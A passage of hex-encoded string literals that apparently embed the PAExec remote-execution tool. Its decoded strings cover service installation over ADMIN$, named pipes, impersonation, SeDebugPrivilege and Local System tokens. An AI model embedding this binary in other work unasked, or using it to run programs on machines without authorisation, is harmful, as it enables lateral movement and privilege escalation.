'000030f441008e000000c8e641002b0000003cf441006d00000048f441008' \
'300000058e741003d00000054f441008600000048e741003b00000060f441' \
'0084000000f0e64100300000006cf441009d00000078f441007700000084f' \
'441007500000090f441005500000000e64100120000009cf4410096000000' \
'a8f4410054000000b4f441009700000008e6410013000000c0f441008d000' \
'00020e7410036000000ccf441007e00000010e6410014000000d8f4410056' \
'00000018e6410015000000e4f4410057000000f0f4410098000000fcf4410' \
'08c0000000cf541009f0000001cf54100a800000020e64100160000002cf5' \
'41005800000028e641001700000038f541005900000050e741003c0000004' \
'4f541008500000050f54100a70000005cf541007600000068f541009c0000' \
'0038e641001900000074f541005b00000080e641002200000080f54100640' \
'000008cf54100be0000009cf54100c3000000acf54100b0000000bcf54100' \
'b8000000ccf54100cb000000dcf54100c700000040e641001a000000ecf54' \
'1005c00000064ef4100e3000000f8f54100c200000010f64100bd00000028' \
'f64100a600000040f641009900000048e641001b00000058f641009a00000' \
'064f641005d00000008e741003300000070f641007a00000070e741004000' \
'00007cf641008a00000030e74100380000008cf641008000000038e741003' \
'900000098f641008100000050e641001c000000a4f641005e000000b0f641' \
'006e00000058e641001d000000bcf641005f00000018e7410035000000c8f' \
'641007c00000070e6410020000000d4f641006200000060e641001e000000' \
'e0f641006000000010e7410034000000ecf641009e00000004f741007b000' \
'000a8e64100270000001cf741006900000028f741006f00000034f7410003' \
'00000044f74100e200000054f741009000000060f74100a10000006cf7410' \
'0b200000078f74100aa00000084f741004600000090f74100700000006100' \
'720000000000620067000000000063006100000000007a0068002d0043004' \
'8005300000000006300730000000000640061000000000064006500000000' \
'0065006c000000000065006e0000000000650073000000000066006900000' \
'0000066007200000000006800650000000000680075000000000069007300' \
'0000000069007400000000006a006100000000006b006f00000000006e006' \
'c00000000006e006f000000000070006c0000000000700074000000000072' \
'006f00000000007200750000000000680072000000000073006b000000000' \
'0730071000000000073007600000000007400680000000000740072000000' \
'00007500720000000000690064000000000075006b0000000000620065000' \
'000000073006c000000000065007400000000006c007600000000006c0074' \
'0000000000660061000000000076006900000000006800790000000000610' \
'07a000000000065007500000000006d006b00000000006100660000000000' \
'6b0061000000000066006f000000000068006900000000006d00730000000' \
'0006b006b00000000006b00790000000000730077000000000075007a0000' \
'0000007400740000000000700061000000000067007500000000007400610' \
'00000000074006500000000006b006e00000000006d007200000000007300' \
'6100000000006d006e000000000067006c00000000006b006f006b0000007' \
'3007900720000006400690076000000610072002d00530041000000620067' \
'002d00420047000000630061002d00450053000000630073002d0043005a0' \
'00000640061002d0044004b000000640065002d0044004500000065006c00' \
'2d00470052000000660069002d00460049000000660072002d00460052000' \
'000680065002d0049004c000000680075002d00480055000000690073002d' \
'00490053000000690074002d004900540000006e006c002d004e004c00000' \
'06e0062002d004e004f00000070006c002d0050004c000000700074002d00' \
'42005200000072006f002d0052004f000000720075002d005200550000006' \
'80072002d0048005200000073006b002d0053004b000000730071002d0041' \
'004c000000730076002d00530045000000740068002d00540048000000740' \
'072002d00540052000000750072002d0050004b000000690064002d004900' \
'4400000075006b002d00550041000000620065002d0042005900000073006' \
'c002d00530049000000650074002d004500450000006c0076002d004c0056' \
'0000006c0074002d004c0054000000660061002d004900520000007600690' \
'02d0056004e000000680079002d0041004d00000061007a002d0041005a00' \
'2d004c00610074006e0000000000650075002d004500530000006d006b002' \
'd004d004b00000074006e002d005a0041000000780068002d005a00410000' \
'007a0075002d005a0041000000610066002d005a00410000006b0061002d0' \
'047004500000066006f002d0046004f000000680069002d0049004e000000' \
'6d0074002d004d0054000000730065002d004e004f0000006d0073002d004' \
'd00590000006b006b002d004b005a0000006b0079002d004b004700000073' \
'0077002d004b004500000075007a002d0055005a002d004c00610074006e0' \
'000000000740074002d0052005500000062006e002d0049004e0000007000' \
'61002d0049004e000000670075002d0049004e000000740061002d0049004' \
'e000000740065002d0049004e0000006b006e002d0049004e0000006d006c' \
'002d0049004e0000006d0072002d0049004e000000730061002d0049004e0' \
'000006d006e002d004d004e000000630079002d0047004200000067006c00' \
'2d004500530000006b006f006b002d0049004e00000000007300790072002' \
'd0053005900000000006400690076002d004d00560000000000710075007a' \
'002d0042004f00000000006e0073002d005a00410000006d0069002d004e0' \
'05a000000610072002d00490051000000640065002d004300480000006500' \
'6e002d00470042000000650073002d004d0058000000660072002d0042004' \
'5000000690074002d004300480000006e006c002d004200450000006e006e' \
'002d004e004f000000700074002d00500054000000730072002d005300500' \
'02d004c00610074006e0000000000730076002d0046004900000061007a00' \
'2d0041005a002d004300790072006c0000000000730065002d00530045000' \
'0006d0073002d0042004e00000075007a002d0055005a002d004300790072' \
'006c0000000000710075007a002d004500430000000000610072002d00450' \
'0470000007a0068002d0048004b000000640065002d004100540000006500' \
'6e002d00410055000000650073002d00450053000000660072002d0043004' \
'1000000730072002d00530050002d004300790072006c0000000000730065' \
'002d00460049000000710075007a002d005000450000000000610072002d0' \
'04c00590000007a0068002d00530047000000640065002d004c0055000000' \
'65006e002d00430041000000650073002d00470054000000660072002d004' \
'30048000000680072002d0042004100000073006d006a002d004e004f0000' \
'000000610072002d0044005a0000007a0068002d004d004f0000006400650' \
'02d004c004900000065006e002d004e005a000000650073002d0043005200' \
'0000660072002d004c0055000000620073002d00420041002d004c0061007' \
'4006e000000000073006d006a002d005300450000000000610072002d004d' \
'004100000065006e002d00490045000000650073002d00500041000000660' \
'072002d004d0043000000730072002d00420041002d004c00610074006e00' \
'0000000073006d0061002d004e004f0000000000610072002d0054004e000' \
'00065006e002d005a0041000000650073002d0044004f000000730072002d' \
'00420041002d004300790072006c000000000073006d0061002d005300450' \
'000000000610072002d004f004d00000065006e002d004a004d0000006500' \
'73002d0056004500000073006d0073002d004600490000000000610072002' \
'd0059004500000065006e002d00430042000000650073002d0043004f0000' \
'0073006d006e002d004600490000000000610072002d00530059000000650' \
'06e002d0042005a000000650073002d00500045000000610072002d004a00' \
'4f00000065006e002d00540054000000650073002d0041005200000061007' \
'2002d004c004200000065006e002d005a0057000000650073002d00450043' \
'000000610072002d004b005700000065006e002d005000480000006500730' \
'02d0043004c000000610072002d00410045000000650073002d0055005900' \
'0000610072002d00420048000000650073002d00500059000000610072002' \
'd00510041000000650073002d0042004f000000650073002d005300560000' \
'00650073002d0048004e000000650073002d004e0049000000650073002d0' \
'05000520000007a0068002d00430048005400000000007300720000000000' \
'610066002d007a0061000000610072002d00610065000000610072002d006' \
'20068000000610072002d0064007a000000610072002d0065006700000061' \
'0072002d00690071000000610072002d006a006f000000610072002d006b0' \
'077000000610072002d006c0062000000610072002d006c00790000006100' \
'72002d006d0061000000610072002d006f006d000000610072002d0071006' \
'1000000610072002d00730061000000610072002d00730079000000610072' \
'002d0074006e000000610072002d0079006500000061007a002d0061007a0' \
'02d006300790072006c000000000061007a002d0061007a002d006c006100' \
'74006e0000000000620065002d00620079000000620067002d00620067000' \
'00062006e002d0069006e000000620073002d00620061002d006c00610074' \
'006e0000000000630061002d00650073000000630073002d0063007a00000' \
'0630079002d00670062000000640061002d0064006b000000640065002d00' \
'610074000000640065002d00630068000000640065002d006400650000006' \
'40065002d006c0069000000640065002d006c00750000006400690076002d' \
'006d0076000000000065006c002d0067007200000065006e002d006100750' \
'0000065006e002d0062007a00000065006e002d0063006100000065006e00' \
'2d0063006200000065006e002d0067006200000065006e002d00690065000' \
'00065006e002d006a006d00000065006e002d006e007a00000065006e002d' \
'0070006800000065006e002d0074007400000065006e002d0075007300000' \
'065006e002d007a006100000065006e002d007a0077000000650073002d00' \
'610072000000650073002d0062006f000000650073002d0063006c0000006' \
'50073002d0063006f000000650073002d00630072000000650073002d0064' \
'006f000000650073002d00650063000000650073002d00650073000000650' \
'073002d00670074000000650073002d0068006e000000650073002d006d00' \
'78000000650073002d006e0069000000650073002d0070006100000065007' \
'3002d00700065000000650073002d00700072000000650073002d00700079' \
'000000650073002d00730076000000650073002d007500790000006500730' \
'02d00760065000000650074002d00650065000000650075002d0065007300' \
'0000660061002d00690072000000660069002d0066006900000066006f002' \
'd0066006f000000660072002d00620065000000660072002d006300610000' \
'00660072002d00630068000000660072002d00660072000000660072002d0' \
'06c0075000000660072002d006d006300000067006c002d00650073000000' \
'670075002d0069006e000000680065002d0069006c000000680069002d006' \
'9006e000000680072002d00620061000000680072002d0068007200000068' \
'0075002d00680075000000680079002d0061006d000000690064002d00690' \
'064000000690073002d00690073000000690074002d006300680000006900' \
'74002d006900740000006a0061002d006a00700000006b0061002d0067006' \
'50000006b006b002d006b007a0000006b006e002d0069006e0000006b006f' \
'006b002d0069006e00000000006b006f002d006b00720000006b0079002d0' \
'06b00670000006c0074002d006c00740000006c0076002d006c0076000000' \
'6d0069002d006e007a0000006d006b002d006d006b0000006d006c002d006' \
'9006e0000006d006e002d006d006e0000006d0072002d0069006e0000006d' \
'0073002d0062006e0000006d0073002d006d00790000006d0074002d006d0' \
'0740000006e0062002d006e006f0000006e006c002d006200650000006e00' \
'6c002d006e006c0000006e006e002d006e006f0000006e0073002d007a006' \
'1000000700061002d0069006e00000070006c002d0070006c000000700074' \
'002d00620072000000700074002d00700074000000710075007a002d00620' \
'06f0000000000710075007a002d006500630000000000710075007a002d00' \
'700065000000000072006f002d0072006f000000720075002d00720075000' \
'000730061002d0069006e000000730065002d00660069000000730065002d' \
'006e006f000000730065002d0073006500000073006b002d0073006b00000' \
'073006c002d0073006900000073006d0061002d006e006f00000000007300' \
'6d0061002d00730065000000000073006d006a002d006e006f00000000007' \
'3006d006a002d00730065000000000073006d006e002d0066006900000000' \
'0073006d0073002d006600690000000000730071002d0061006c000000730' \
'072002d00620061002d006300790072006c0000000000730072002d006200' \
'61002d006c00610074006e0000000000730072002d00730070002d0063007' \
'90072006c0000000000730072002d00730070002d006c00610074006e0000' \
'000000730076002d00660069000000730076002d007300650000007300770' \
'02d006b00650000007300790072002d007300790000000000740061002d00' \
'69006e000000740065002d0069006e000000740068002d007400680000007' \
'4006e002d007a0061000000740072002d00740072000000740074002d0072' \
'007500000075006b002d00750061000000750072002d0070006b000000750' \
'07a002d0075007a002d006300790072006c000000000075007a002d007500' \
'7a002d006c00610074006e0000000000760069002d0076006e00000078006' \
'8002d007a00610000007a0068002d00630068007300000000007a0068002d' \
'00630068007400000000007a0068002d0063006e0000007a0068002d00680' \
'06b0000007a0068002d006d006f0000007a0068002d007300670000007a00' \
'68002d007400770000007a0075002d007a006100000041000000170000000' \
'0000000068080868081800000100386808682801405054545458585850500' \
'0030308050808800080028273850578000070037303050508800000020288' \
'0888080000000606860686868080807787070777070080800000800080007' \
'080000005500530045005200330032002e0044004c004c00000000004d657' \
'373616765426f78570047657441637469766557696e646f77004765744c61' \
'7374416374697665506f7075700000476574557365724f626a656374496e6' \
'66f726d6174696f6e5700000047657450726f6365737357696e646f775374' \
'6174696f6e0043004f004e004f0055005400240000006d61702f7365743c5' \
'43e20746f6f206c6f6e67008c2842004410400020003a003d000000220000' \
'002d002f0000000000efbbbf005c005c002e005c0070006900700065005c0' \
'05000410045007800650063004f0075007400250073002500750000000000' \
'0000000050004100450078006500630020006600610069006c00650064002' \
'00074006f0020006300720065006100740065002000700069007000650020' \
'00250073002e00000000005c005c002e005c0070006900700065005c00500' \
'0410045007800650063004500720072002500730025007500000000005c00' \
'5c002e005c0070006900700065005c0050004100450078006500630049006' \
'e00250073002500750000004500720072006f007200200063007200650061' \
'00740069006e00670020007200650064006900720065006300740069006f0' \
'06e0020007000690070006500730000000000000000004400450042005500' \
'47003a00200043006c00690065006e007400200063006f006e006e0065006' \
'300740065006400200074006f00200070006900700065000000257300005c' \
'005c00250073005c0070006900700065005c0050004100450078006500630' \
'04f0075007400250073002500750000005c005c00250073005c0070006900' \
'700065005c005000410045007800650063004500720072002500730025007' \
'50000005c005c00250073005c0070006900700065005c0050004100450078' \
'006500630049006e002500730025007500000000004600610069006c00650' \
'06400200074006f0020006f00700065006e002000720065006d006f007400' \
'65002000700069007000650073000000766563746f723c543e20746f6f206' \
'c6f6e670000696e76616c696420737472696e6720706f736974696f6e0073' \
'7472696e6720746f6f206c6f6e6700496e746572616374697665536573736' \
'96f6e2e63707000005500730069006e006700200053006500730073006900' \
'6f006e00490044002000250075002000280069006e0074006500720061006' \
'30074006900760065002000730065007300730069006f006e002900000000' \
'005500730069006e0067002000530065007300730069006f006e004900440' \
'02000250075002000660072006f006d00200070006100720061006d007300' \
'0000000053006500540063006200500072006900760069006c00650067006' \
'50000000000000000004600610069006c0065006400200074006f00200073' \
'0065007400200069006e00740065007200610063007400690076006500200' \
'074006f006b0065006e0000004b00650072006e0065006c00330032002e00' \
'64006c006c0000000000575453476574416374697665436f6e736f6c65536' \
'57373696f6e49640000000000000000570054005300470065007400410063' \
'00740069007600650043006f006e0073006f006c006500530065007300730' \
'069006f006e004900640020006e006f007400200073007500700070006f00' \
'720074006500640020006f006e002000740068006900730020004f0053000' \
'0007300650072007600690063006500000064006200670000006c006f0000' \
'0000002d006c006f0020006d0069007300730069006e00670020007600610' \
'06c007500650000002e000000000000005000410045007800650063002000' \
'740069006d006500640020006f00750074002000770061006900740069006' \
'e006700200066006f0072002000610070007000200074006f002000650078' \
'006900740020002d002d0020007400650072006d0069006e0061007400690' \
'06e0067002000610070007000000050004100450078006500630020006500' \
'720072006f0072002000770061006900740069006e006700200066006f007' \
'2002000610070007000200074006f00200065007800690074000000000025' \
'0073002000730074006100720074006500640020007700690074006800200' \
'0700072006f00630065007300730020004900440020002500750000007b00' \
'6c006f00630061006c0020007300650072007600650072007d00000000000' \
'd000a0043006f006e006e0065006300740069006e006700200074006f0020' \
'00250073002e002e002e000000000000005300740061007200740069006e0' \
'0670020005000410045007800650063002000730065007200760069006300' \
'650020006f006e002000250073002e002e002e000000000043006f0070007' \
'90069006e0067002000250073002000720065006d006f00740065006c0079' \
'002e002e002e000000000043006f007000790069006e00670020002500750' \
'02000660069006c00650073002000720065006d006f00740065006c007900' \
'2e002e002e0000000000410044004d0049004e00240000000000490050004' \
'300240000000000000000000d000a00500041004500780065006300200072' \
'0065007400750072006e0069006e006700200065007800690074002000630' \
'06f00640065002000250064000d000a0000007600250075002e0025007500' \
'00000000000000000d000a005000410045007800650063002000250073002' \
'0002d00200045007800650063007500740065002000500072006f00670072' \
'0061006d0073002000520065006d006f00740065006c0079000d000a00430' \
'06f0070007900720069006700680074002000280063002900200032003000' \
'310032002d003200300031003300200050006f00770065007200200041006' \
'4006d0069006e0020004c004c0043000d000a007700770077002e0070006f' \
'00770065007200610064006d0069006e002e0063006f006d002f005000410' \
'045007800650063000d000a0000005400450058005400000000000d0a0000' \
'000000004500720072006f0072002000670065007400740069006e0067002' \
'000660069006c006500200069006e0066006f002000660072006f006d0020' \
'00250073002e00000000005e43202873746f7070696e67290d0a005400690' \
'06d0065006f0075007400200063006f006e006e0065006300740069006e00' \
'6700200074006f002000250073002e002e002e000000d4284200d64e40005' \
'c000000000000002f00610063006300650070007400650075006c00610000' \
'002d00610063006300650070007400650075006c00610000005c005c002a0' \
'000004e006f00200063006f006d0070007500740065007200730020006300' \
'6f0075006c006400200062006500200066006f0075006e00640000000d000' \
'a000000000043006f006d007000750074006500720020006c006900730074' \
'002000660069006c006500200065006d00700074007900000000005c005c0' \
'0000000002c00000043006f006d007000750074006500720020006e006f00' \
'7400200073007000650063006900660069006500640000000000750000007' \
'0000000700040000000000070004000640000006e0000006c000000680000' \
'00730000006500000078000000690000006300000063006e006f006400650' \
'06c0000000000660000007600000077000000640000006c006f0077000000' \
'620065006c006f0077006e006f0072006d0061006c000000610062006f007' \
'60065006e006f0072006d0061006c00000068006900670068000000000072' \
'00650061006c00740069006d006500000000006200610063006b006700720' \
'06f0075006e00640000000000610000006300730072006300000000006300' \
'6c006900730074000000640066007200000072006c006f00000074006f000' \
'00000006e006f006e0061006d006500000000006100630063006500700074' \
'00650075006c0061000000000052006500610063006800650064002000650' \
'06e00640020006f006600200063006f006d006d0061006e00640020006200' \
'650066006f0072006500200073006500650069006e0067002000650078007' \
'0006500630074006500640020007000610072007400730000002500730020' \
'006900730020006e006f0074002000610020007200650063006f0067006e0' \
'069007a006500640020006f007000740069006f006e0000002f003f000000' \
'00002d003f0000000000000000002d0061002000730070006500630069006' \
'600690065006400200077006900740068006f007500740020006e006f006e' \
'002d007a00650072006f002000760061006c0075006500730000000000430' \
'061006e0027007400200075007300650020002d006800200061006e006400' \
'20002d006c00200074006f006700650074006800650072000000000043006' \
'1006e0027007400200075007300650020002d0068002c0020002d0073002c' \
'0020006f00720020002d006c00200074006f0067006500740068006500720' \
'00000000000000000530065007400740069006e00670020002d006e002000' \
'7700680065006e0020006e006f00200063006f006d0070007500740065007' \
'2007300200073007000650063006900660069006500640000000000530065' \
'007400740069006e00670020002d006e00200074006f00200030000000220' \
'00000200000004600610069006c0065006400200074006f00200064006500' \
'6c0065007400650020007000400064002000660069006c00650000002d007' \
'500200077006900740068006f007500740020007500730065007200000050' \
'0061007300730077006f00720064003a00200000000000430061006e00270' \
'07400200075007300650020002d007300200061006e00640020002d006c00' \
'200074006f00670065007400680065007200000000002d007700200077006' \
'900740068006f00750074002000760061006c007500650000000000530070' \
'00650063006900660069006500640020002d0078002000770069007400680' \
'06f007500740020002d00730000002d006300730072006300200077006900' \
'740068006f007500740020002d006300000000002d0063007300720063002' \
'00077006900740068006f00750074002000760061006c007500650000002d' \
'006300730072006300200061006e00640020002d0063006c0069007300740' \
'0200061007200650020006e006f007400200063006f006d00700061007400' \
'690062006c00650000002d0063006c0069007300740020007700690074006' \
'8006f007500740020002d00630000002d0063006c00690073007400200077' \
'006900740068006f00750074002000760061006c0075006500000000002d0' \
'063006c006900730074002000660069006c006500200065006d0070007400' \
'790000002d0063006e006f00640065006c00200077006900740068006f007' \
'500740020002d006300000000002d0072006c006f0020006d006900730073' \
'0069006e0067002000760061006c007500650000000000000000002d00640' \
'0200061006e00640020002d0074006f002000630061006e006e006f007400' \
'20006200650020007500730065006400200074006f0067006500740068006' \
'50072000000000069006e00760061006c006900640020006f00720020006d' \
'0069007300730069006e0067002000760061006c0075006500200066006f0' \
'0720020002d0074006f00000000004e006f0020006100700070006c006900' \
'63006100740069006f006e002000730070006500630069006600690065006' \
'400000000004f006e00650020006f00720020006d006f0072006500200073' \
'006f0075007200630065002000660069006c0065007300200077006500720' \
'0650020006e006f007400200066006f0075006e0064002e00200020005400' \
'7200790020002d00630073007200630020006f00720020002d0063006c006' \
'900730074003f00000000004500720072006f00720020006400750070006c' \
'00690063006100740069006e0067002000610020007500730065007200200' \
'074006f006b0065006e0020002800250053002c0020002500640029000000' \
'5300650044006500620075006700500072006900760069006c00650067006' \
'50000000000000000004e006f0074002000610062006c006500200074006f' \
'00200067006500740020004c006f00630061006c002000530079007300740' \
'065006d00200074006f006b0065006e000000000047006f00740020004c00' \
'6f00630061006c002000530079007300740065006d002000680061006e006' \
'4006c006500000050726f636573732e637070004500720072006f00720020' \
'006c006f006700670069006e006700200069006e002000610073002000250' \
'07300000000005300650052006500730074006f0072006500500072006900' \
'760069006c0065006700650000000000530065004200610063006b0075007' \
'000500072006900760069006c0065006700650000004600610069006c0065' \
'006400200074006f00200069006d0070006500720073006f006e006100740' \
'06500200063006c00690065006e0074002000750073006500720000004900' \
'6d0070006500720073006f006e0061007400650064002000630061006c006' \
'c00650072000000000000004600610069006c0065006400200074006f0020' \
'006f00700065006e002000630075007200720065006e00740020007500730' \
'065007200200074006f006b0065006e000000220025007300220000000000' \
'4600610069006c0065006400200074006f002000500072006500700046006' \
'f00720049006e00740065007200610063007400690076006500500072006f' \
'0063006500730073000000570069006e0053007400610030005c004400650' \
'06600610075006c0074000000770069006e0073007400610030005c005700' \
'69006e006c006f0067006f006e00000000000000000050004100450078006' \
'500630020007300740061007200740069006e0067002000700072006f0063' \
'0065007300730020005b00250073005d0020006100730020004c006f00630' \
'061006c002000530079007300740065006d00000000004800610076006500' \
'2000620061006400200075007300650072002000680061006e0064006c006' \
'500000000005300650049006d0070006500720073006f006e006100740065' \
'00500072006900760069006c00650067006500000000004600610069006c0' \
'065006400200074006f00200069006d0070006500720073006f006e006100' \
'74006500000053006500410073007300690067006e005000720069006d006' \
'1007200790054006f006b0065006e00500072006900760069006c00650067' \
'00650000005300650049006e00630072006500610073006500510075006f0' \
'074006100500072006900760069006c006500670065000000000000000000' \
'50004100450078006500630020007300740061007200740069006e0067002' \
'000700072006f00630065007300730020005b00250073005d002000610073' \
'0020002500730000000000500041004500780065006300200073007400610' \
'07200740069006e0067002000700072006f00630065007300730020005b00' \
'250073005d002000610073002000630075007200720065006e00740020007' \
'500730065007200000000007b006e0075006c006c007d00000000007b0065' \
'006e0076007d0000007b006e006f006e002d006e0075006c006c007d00000' \
'000004c00610075006e0063006800200028006c00610075006e0063006800' \
'47004c0045003d00250075002900200070006100720061006d0073003a002' \
'00070006100740068003d005b00250073005d00200075007300650072003d' \
'005b00250073005d002c002000700045006e0076003d005b00250073005d0' \
'02c0020006400690072003d005b00250073005d002c002000730074006400' \
'69006e003d005b007800250058005d002c0020007300740064006f0075007' \
'4003d005b007800250058005d002c0020007300740064006500720072003d' \
'005b007800250058005d00000053007500630063006500730073006600750' \
'06c006c00790020006c00610075006e006300680065006400000046006100' \
'69006c0065006400200074006f00200073007400610072007400200025007' \
'3002e00000000000000480049004e0054003a002000500041004500780065' \
'0063002000700072006f006200610062006c00790020006e0065006500640' \
'07300200074006f0020006200650020002200520075006e00200041007300' \
'2000410064006d0069006e006900730074007200610074006f00720022000' \
'000000000000000430061006e0027007400200065006e0075006d00500072' \
'006f0063006500730073006500730020002d0020004600610069006c00650' \
'06400200074006f002000670065007400200074006f006b0065006e002000' \
'66006f00720020004c006f00630061006c002000530079007300740065006' \
'd002e00000053002d0031002d0035002d0031003800000000000000000046' \
'00610069006c0065006400200074006f002000670065007400200074006f0' \
'06b0065006e00200066006f00720020004c006f00630061006c0020005300' \
'79007300740065006d002e000000610064007600610070006900330032002' \
'e0064006c006c000000000053616665724372656174654c6576656c000000' \
'005361666572436f6d70757465546f6b656e46726f6d4c6576656c0000536' \
'1666572436c6f73654c6576656c00530061006600650072002e002e002e00' \
'2000630061006c006c00730020006e006f007400200073007500700070006' \
'f00720074006500640020006f006e002000740068006900730020004f0053' \
'0020002d002d002000630061006e002700740020006c0069006d006900740' \
'020007200690067006800740073000000000000004600610069006c006500' \
'6400200074006f0020006c0069006d0069007400200072006900670068007' \
'400730020002800530061006600650072004300720065006100740065004c' \
'006500760065006c0029002e00000000004600610069006c0065006400200' \
'074006f0020006c0069006d00690074002000720069006700680074007300' \
'200028005300610066006500720043006f006d00700075007400650054006' \
'f006b0065006e00460072006f006d004c006500760065006c0029002e0000' \
'0000000000000044006f006e0027007400200068006100760065002000610' \
'0200067006f006f0064002000750073006500720020002d002d0020006300' \
'61006e002700740020006c0069006d0069007400200072006900670068007' \
'4007300000000004600610069006c0065006400200074006f002000670065' \
'007400200065006c00650076006100740065006400200074006f006b00650' \
'06e0000000000430061006e00270074002000710075006500720079002000' \
'74006f006b0065006e00200074006f002000720075006e00200065006c006' \
'5007600610074006500640020002d00200063006f006e00740069006e0075' \
'0069006e006700200061006e00790077006100790000005c005c002500730' \
'05c002500730000004600610069006c0065006400200074006f0020006300' \
'6f006e006e00650063007400200074006f002000250073002e00000000002' \
'e00650078006500000000005c005c00250073005c00410044004d0049004e' \
'0024005c0025007300000000004600610069006c0065006400200074006f0' \
'0200063006c00650061006e007500700020005b00250073005d0020006f00' \
'6e002000250073002e0000004600610069006c0065006400200074006f002' \
'00063006f007000790020005b00250073005d00200074006f0020005b0025' \
'0073005d0020002d002d00200067006f0069006e006700200074006f00200' \
'0740072007900200074006f00200063006f006e00740069006e0075006500' \
'200061006e0079007700610079002e0000005000410045007800650063000' \
'00000005000410045007800650063002d000000250075002d002500730000' \
'007b006c006f00630061006c00200063006f006d007000750074006500720' \
'07d00000000004600610069006c0065006400200074006f00200063006f00' \
'6e006e00650063007400200074006f0020005300650072007600690063006' \
'500200043006f006e00740072006f006c0020004d0061006e006100670065' \
'00720020006f006e002000250073002e0020002000430061006e002700740' \
'0200063006c00650061006e00750070002000500041004500780065006300' \
'2e00000000004600610069006c0065006400200074006f002000730074006' \
'f007000200050004100450078006500630020007300650072007600690063' \
'0065002e00000000004600610069006c0065006400200074006f002000640' \
'065006c006500740065002000500041004500780065006300200073006500' \
'7200760069006300650000004600610069006c0065006400200074006f002' \
'00063006f006e006e00650063007400200074006f00200053006500720076' \
'00690063006500200043006f006e00740072006f006c0020004d0061006e0' \
'0610067006500720020006f006e002000250073002e000000250025005300' \
'79007300740065006d0052006f006f007400250025005c00250073002e006' \
'50078006500000020002d0073006500720076006900630065000000460061' \
'0069006c0065006400200074006f00200069006e007300740061006c006c0' \
'02000730065007200760069006300650020006f006e002000250073000000' \
'4600610069006c0065006400200074006f002000730074006100720074002' \
'000730065007200760069006300650020006f006e0020002500730000002e' \
'657865000000005c005c00250073005c0070006900700065005c002500730' \
'0000000004600610069006c0065006400200074006f0020006f0070006500' \
'6e00200063006f006d006d0075006e00690063006100740069006f006e002' \
'0006300680061006e006e0065006c00200074006f002000250073002e0000' \
'00540069006d006500640020006f007500740020007700610069007400690' \
'06e006700200066006f007200200063006f006d006d0075006e0069006300' \
'6100740069006f006e0020006300680061006e006e0065006c00200074006' \
'f002000250073002e00000000004600610069006c0065006400200074006f' \
'002000730065007400200063006f006d006d0075006e00690063006100740' \
'069006f006e0020006300680061006e006e0065006c00200074006f002000' \
'250073002e00000000004500720072006f007200200063006f006d006d007' \
'5006e00690063006100740069006e00670020007700690074006800200025' \
'0073002e0000000000000000004500720072006f007200200072006500610' \
'0640069006e006700200072006500730070006f006e007300650020006600' \
'72006f006d002000250073002e00000052006500630065006900760065006' \
'400200074006f006f0020006c006900740074006c00650020006400610074' \
'0061002000660072006f006d002000250073002e000000250073002000720' \
'065007400750072006e006500640020002500690000000000000000005200' \
'65006d006f0074006500200061007000700020006600610069006c0065006' \
'400200074006f002000730074006100720074002e00200020005200650074' \
'00750072006e006500640020006500720072006f0072003a000d000a00200' \
'0200025007300000000005c005c00250073005c00410044004d0049004e00' \
'24005c005000410045007800650063005f004d006f0076006500250075002' \
'e0064006100740000005c005000410045007800650063005f004d006f0076' \
'006500250075002e00640061007400000000004600610069006c006500640' \
'0200074006f00200063006f007000790020005b00250073005d0020007400' \
'6f0020005b00250073005d002e00000000004600610069006c00650064002' \
'00074006f0020006f00700065006e00200063006f006d006d002000700069' \
'00700065007300200066006f0072002000250073002e002000000000004e0' \
'06f00740020007500730069006e0067002000720065006400690072006500' \
'6300740065006400200049004f003a00200044006f006e007400570061006' \
'90074003d00250075002c00200049006e0074006500720061006300740069' \
'00760065003d0025007500000000002500730020007200650074007500720' \
'06e0065006400200025006400000000004e006f0074002000770061006900' \
'740069006e006700200066006f007200200025007300200074006f0020006' \
'50078006900740000000000740072007500650000000000660061006c0073' \
'0065000000000000002d002d002d002d002d002d002d002d002d002d002d0' \
'02d002d000d000a0055007300650072003a00200027002500730027002c00' \
'20004c006f00630061006c00530079007300740065006d003a00200025007' \
'3002c00200049006e007400650072006100630074006900760065003a0020' \
'00250073002c002000530065007300730069006f006e003a0020002500690' \
'00000000000000000530065007400740069006e0067007300200069006e00' \
'6400690063006100740065002000660069006c006500730020006d0061007' \
'90020006e00650065006400200074006f00200062006500200063006f0070' \
'0069006500640020002d002d00200063006800650063006b0069006e00670' \
'02e002e002e000000000020002000200020002e002e002e006e0065006500' \
'6400200074006f00200063006f00700079002000660069006c00650073000' \
'00020002000200020002e002e002e006e006f002000660069006c00650073' \
'0020006e00650065006400200074006f00200062006500200063006f00700' \
'0690065006400000053006f0075007200630065002000660069006c006500' \
'200064006f006500730020006e006f0074002000650078006900730074000' \
'00000004600610069006c0065006400200074006f0020006d006f00760065' \
'0020005b00250073005d00200074006f0020005b00250073005d0000004d0' \
'06f00760065006400200025007300200074006f0020002500730000000000' \
'0000000050004100450078006500630020007300650072007600690063006' \
'5002000730074006f007000700069006e006700200028006100730079006e' \
'0063002900000050004100450078006500630020007300650072007600690' \
'0630065002000730074006f007000700069006e0067000000500041004500' \
'7800650063002000720065006300650069007600650064002000720065007' \
'1007500650073007400200074006f002000730074006f0070002c00200062' \
'007500740020007300740069006c006c00200068006100760065002000610' \
'0630074006900760065002000720065007100750065007300740073002e00' \
'20002000570069006c006c002000730074006f00700020006c00610074006' \
'50072002e00000000004500720072006f0072002000720065006100640069' \
'006e006700200072006500710075006500730074002000660072006f006d0' \
'02000700069007000650020002d002d002000730074006f00700070006900' \
'6e00670020007300650072007600690063006500000052006500630065006' \
'900760065006400200074006f006f0020006c006900740074006c00650020' \
'006400610074006100200069006e002000720065007100750065007300740' \
'020002d002d002000730074006f007000700069006e006700200073006500' \
'7200760069006300650000004500720072006f0072002000730065006e006' \
'40069006e0067002000640061007400610020006200610063006b0020002d' \
'002d002000730074006f007000700069006e0067002000730065007200760' \
'06900630065002e0000000000500041004500780065006300200053006500' \
'720076006900630065004d00610069006e002000730074006100720074006' \
'9006e0067002e000000000052006500670069007300740065007200530065' \
'00720076006900630065004300740072006c00480061006e0064006c00650' \
'0720020006600610069006c0065006400200069006e002000500041004500' \
'78006500630000004600610069006c0065006400200074006f00200073006' \
'90067006e0061006c0020005000410045007800650063002000720075006e' \
'006e0069006e0067002e00000000005000410045007800650063002000730' \
'06500720076006900630065002000720075006e006e0069006e0067002e00' \
'00005c005c002e005c0070006900700065005c00250073000000500041004' \
'5007800650063002000630072006500610074006500640020007000690070' \
'0065002000250073002e00000050004100450078006500630020006500780' \
'06900740069006e00670020006c006f006f0070002e000000000050004100' \
'450078006500630020006600610069006c0065006400200074006f0020007' \
'3007400610072007400200053006500720076006900630065004300740072' \
'006c0044006900730070006100740063006800650072002e0000005300650' \
